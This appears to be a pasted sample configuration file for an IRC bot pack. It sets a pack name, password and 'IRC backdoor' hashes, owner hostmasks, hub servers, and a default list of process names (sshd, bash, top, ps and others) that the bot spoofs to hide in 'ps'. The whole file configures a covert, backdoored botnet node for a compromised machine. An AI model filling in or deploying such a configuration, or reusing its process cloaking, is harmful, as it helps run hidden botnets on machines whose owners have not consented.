pack.cfg.sample 1.4 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556
  1. /* The < && > indicates the area you must change! */
  2. /* PACKNAME: name of the pack */
  3. PACKNAME <name>
  4. /* SHELLHASH: 33 char md5 hash used for binary password */
  5. SHELLHASH <md5hash>
  6. /* BDHASH: 33 char md5 hash used for IRC backdoor */
  7. BDHASH <md5hash>
  8. /* DCCPREFIX: 1 char cmd prefix for dcc. (ie, .cmd or !cmd) */
  9. DCCPREFIX <.>
  10. /* The settings below can each be defined multiple times */
  11. /* OWNER <nick password host>
  12. * Multiple OWNER lines may be defined, each will be added as a +a perm owner.
  13. * nick: nickname what else?
  14. * password: initial password for user
  15. * host: hosts of the user (list as many as needed)
  16. */
  17. OWNER <Bob S0m3P4ass *!bob@1.2.3.4 *!*@1.2.3.4>
  18. /* OWNEREMAIL: email addresses that status/errors will be sent to when needed
  19. * list as many as needed
  20. */
  21. OWNEREMAIL <some@email.com>
  22. /* HUB <nick host port host>
  23. * Hubs are ranked by the order they are listed (previously was hublevel in settings.c)
  24. * nick: nick of hub
  25. * host: hostname or ip of hub
  26. * port: port the hub listens on
  27. * ident: ident of the hub (list as many as needed)
  28. */
  29. HUB <God god.net 666 god ~God>
  30. /* PSCLOAK <name>
  31. * name: the name of the program to spoof as in 'ps'
  32. * list as many as needed
  33. * A default list is provided
  34. */
  35. PSCLOAK -bash
  36. PSCLOAK ftp
  37. PSCLOAK /usr/sbin/sshd
  38. PSCLOAK man
  39. PSCLOAK pine
  40. PSCLOAK bash
  41. PSCLOAK top
  42. PSCLOAK last
  43. PSCLOAK w
  44. PSCLOAK ps ux
  45. PSCLOAK bash
  46. PSCLOAK ./psybnc
  47. PSCLOAK BitchX